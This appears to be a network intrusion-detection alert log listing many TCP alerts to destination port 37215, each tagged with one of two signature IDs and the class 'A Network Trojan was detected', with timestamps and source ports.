                  Timestamp:07/10/24-08:26:47.908603
                  SID:2835222
                  Source Port:45158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835160
                  SID:2835222
                  Source Port:50652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.418339
                  SID:2835222
                  Source Port:39320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.005251
                  SID:2829579
                  Source Port:37276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.262409
                  SID:2829579
                  Source Port:52276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.949060
                  SID:2835222
                  Source Port:44784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.008169
                  SID:2829579
                  Source Port:60484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.581630
                  SID:2829579
                  Source Port:48332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.376738
                  SID:2835222
                  Source Port:50962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.121354
                  SID:2835222
                  Source Port:48738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.755859
                  SID:2835222
                  Source Port:43514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.024186
                  SID:2835222
                  Source Port:54780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.845798
                  SID:2835222
                  Source Port:34570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.782504
                  SID:2829579
                  Source Port:33972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.044198
                  SID:2835222
                  Source Port:47070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.152826
                  SID:2835222
                  Source Port:36774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.829287
                  SID:2829579
                  Source Port:45692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.199033
                  SID:2829579
                  Source Port:38964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.605753
                  SID:2829579
                  Source Port:54758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.618604
                  SID:2829579
                  Source Port:54108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.519002
                  SID:2835222
                  Source Port:44058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.459798
                  SID:2835222
                  Source Port:41988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.615736
                  SID:2829579
                  Source Port:57900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.096599
                  SID:2829579
                  Source Port:39696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.430533
                  SID:2829579
                  Source Port:44798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.766044
                  SID:2829579
                  Source Port:53240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.405670
                  SID:2829579
                  Source Port:42144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.357813
                  SID:2835222
                  Source Port:57502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.989706
                  SID:2835222
                  Source Port:38700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.155297
                  SID:2829579
                  Source Port:44072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.877679
                  SID:2835222
                  Source Port:40604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.927814
                  SID:2829579
                  Source Port:41770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.136124
                  SID:2835222
                  Source Port:36912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.308740
                  SID:2829579
                  Source Port:40228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.482034
                  SID:2829579
                  Source Port:39176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.426882
                  SID:2835222
                  Source Port:56054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.681028
                  SID:2829579
                  Source Port:33796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.901324
                  SID:2835222
                  Source Port:56728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.454904
                  SID:2829579
                  Source Port:40948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.758837
                  SID:2829579
                  Source Port:44256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.856159
                  SID:2835222
                  Source Port:49090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.285937
                  SID:2835222
                  Source Port:51084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.846786
                  SID:2829579
                  Source Port:48996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.140303
                  SID:2835222
                  Source Port:53994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.366242
                  SID:2829579
                  Source Port:46610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.654504
                  SID:2829579
                  Source Port:40990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.601174
                  SID:2829579
                  Source Port:50856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.171769
                  SID:2835222
                  Source Port:44082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.433410
                  SID:2829579
                  Source Port:50340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.023576
                  SID:2835222
                  Source Port:42082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.873303
                  SID:2829579
                  Source Port:34350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.296401
                  SID:2835222
                  Source Port:43344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.450781
                  SID:2829579
                  Source Port:44988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.523968
                  SID:2835222
                  Source Port:44090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.558298
                  SID:2835222
                  Source Port:43178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.376307
                  SID:2835222
                  Source Port:60342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.632992
                  SID:2835222
                  Source Port:48232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.764510
                  SID:2835222
                  Source Port:42694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.980540
                  SID:2835222
                  Source Port:47504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.713774
                  SID:2829579
                  Source Port:34292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.630807
                  SID:2835222
                  Source Port:33306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.410349
                  SID:2835222
                  Source Port:46670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.796781
                  SID:2829579
                  Source Port:58266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.147425
                  SID:2835222
                  Source Port:42056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.081335
                  SID:2835222
                  Source Port:56232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.377189
                  SID:2829579
                  Source Port:57596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.238567
                  SID:2835222
                  Source Port:34334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.559678
                  SID:2829579
                  Source Port:58574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.222748
                  SID:2835222
                  Source Port:58042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.176697
                  SID:2835222
                  Source Port:47762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.255298
                  SID:2835222
                  Source Port:60302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.477524
                  SID:2829579
                  Source Port:49460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.000164
                  SID:2835222
                  Source Port:50402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.124721
                  SID:2835222
                  Source Port:46706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.447222
                  SID:2829579
                  Source Port:48962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.485885
                  SID:2835222
                  Source Port:34356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.172944
                  SID:2835222
                  Source Port:54784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.600329
                  SID:2835222
                  Source Port:51820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.603440
                  SID:2829579
                  Source Port:36132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.903697
                  SID:2835222
                  Source Port:36742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.463708
                  SID:2829579
                  Source Port:44910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.776815
                  SID:2829579
                  Source Port:44032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.825233
                  SID:2835222
                  Source Port:46122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.751159
                  SID:2829579
                  Source Port:60372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.876444
                  SID:2835222
                  Source Port:39782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.242773
                  SID:2829579
                  Source Port:54042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.897837
                  SID:2835222
                  Source Port:54330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.780678
                  SID:2835222
                  Source Port:53150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.777167
                  SID:2835222
                  Source Port:57500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.485057
                  SID:2835222
                  Source Port:41486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.980089
                  SID:2829579
                  Source Port:55638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.367080
                  SID:2835222
                  Source Port:50414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.643057
                  SID:2835222
                  Source Port:46640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.160645
                  SID:2835222
                  Source Port:34344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.990905
                  SID:2835222
                  Source Port:47542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.787511
                  SID:2835222
                  Source Port:60504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.362025
                  SID:2829579
                  Source Port:37178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.369832
                  SID:2835222
                  Source Port:60832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.541025
                  SID:2829579
                  Source Port:47524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.228514
                  SID:2835222
                  Source Port:40486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.813714
                  SID:2835222
                  Source Port:45118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.599918
                  SID:2835222
                  Source Port:48616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.171112
                  SID:2835222
                  Source Port:46368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.222864
                  SID:2835222
                  Source Port:59632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.230409
                  SID:2829579
                  Source Port:55390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.438219
                  SID:2835222
                  Source Port:53770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.525899
                  SID:2829579
                  Source Port:40990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.528584
                  SID:2829579
                  Source Port:58858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.758146
                  SID:2835222
                  Source Port:35046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.799638
                  SID:2829579
                  Source Port:56962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.399018
                  SID:2835222
                  Source Port:49328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.550771
                  SID:2835222
                  Source Port:35450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.332526
                  SID:2829579
                  Source Port:50120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.366890
                  SID:2829579
                  Source Port:46368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.929011
                  SID:2835222
                  Source Port:47554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.663008
                  SID:2829579
                  Source Port:40234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.834313
                  SID:2829579
                  Source Port:47460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.681028
                  SID:2835222
                  Source Port:44440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.733035
                  SID:2829579
                  Source Port:45192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.851044
                  SID:2829579
                  Source Port:55172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.169608
                  SID:2835222
                  Source Port:58324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.603299
                  SID:2835222
                  Source Port:38226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.085617
                  SID:2835222
                  Source Port:34546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.583862
                  SID:2835222
                  Source Port:46514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.172651
                  SID:2829579
                  Source Port:39948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.202638
                  SID:2835222
                  Source Port:48498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.188870
                  SID:2835222
                  Source Port:47346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.817300
                  SID:2835222
                  Source Port:36874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.963360
                  SID:2829579
                  Source Port:37322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.304428
                  SID:2829579
                  Source Port:48048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.502478
                  SID:2835222
                  Source Port:54658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.809253
                  SID:2829579
                  Source Port:47162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.883547
                  SID:2835222
                  Source Port:51212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.889190
                  SID:2829579
                  Source Port:43686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.237308
                  SID:2835222
                  Source Port:43886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.297520
                  SID:2835222
                  Source Port:46760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.883057
                  SID:2829579
                  Source Port:60940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.772266
                  SID:2835222
                  Source Port:33566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.027380
                  SID:2829579
                  Source Port:48066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.910396
                  SID:2835222
                  Source Port:53598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.879790
                  SID:2835222
                  Source Port:37078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.981659
                  SID:2835222
                  Source Port:34922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.515408
                  SID:2829579
                  Source Port:48400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.555900
                  SID:2829579
                  Source Port:45704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.949605
                  SID:2835222
                  Source Port:53562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.150508
                  SID:2835222
                  Source Port:43558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.889339
                  SID:2835222
                  Source Port:48340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.109836
                  SID:2835222
                  Source Port:36212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.646221
                  SID:2835222
                  Source Port:41542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.281440
                  SID:2829579
                  Source Port:36996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.864771
                  SID:2829579
                  Source Port:60864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.916413
                  SID:2835222
                  Source Port:50840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.929800
                  SID:2829579
                  Source Port:60818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.282896
                  SID:2829579
                  Source Port:42134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.886736
                  SID:2829579
                  Source Port:46652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.385980
                  SID:2835222
                  Source Port:36544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.287695
                  SID:2829579
                  Source Port:36970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.880668
                  SID:2835222
                  Source Port:45918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.547340
                  SID:2835222
                  Source Port:35688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.619838
                  SID:2829579
                  Source Port:41512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.865428
                  SID:2835222
                  Source Port:60386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.803775
                  SID:2835222
                  Source Port:42938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.570720
                  SID:2829579
                  Source Port:54742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.911727
                  SID:2835222
                  Source Port:33790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.977821
                  SID:2829579
                  Source Port:45496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.093186
                  SID:2829579
                  Source Port:38344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.486586
                  SID:2829579
                  Source Port:57388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.927122
                  SID:2829579
                  Source Port:34412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.154416
                  SID:2835222
                  Source Port:41924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.056962
                  SID:2829579
                  Source Port:42402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.550771
                  SID:2835222
                  Source Port:33964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.417901
                  SID:2829579
                  Source Port:40212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.477490
                  SID:2835222
                  Source Port:34996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.867031
                  SID:2829579
                  Source Port:53332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.076959
                  SID:2829579
                  Source Port:44702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.497334
                  SID:2829579
                  Source Port:41414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.530695
                  SID:2829579
                  Source Port:47056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.050359
                  SID:2835222
                  Source Port:50830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.308630
                  SID:2829579
                  Source Port:39854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.460773
                  SID:2835222
                  Source Port:40120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.561007
                  SID:2835222
                  Source Port:49508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.824955
                  SID:2829579
                  Source Port:55964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.268658
                  SID:2835222
                  Source Port:41962
                  Destination Port:37215
                  Protocol:TCP
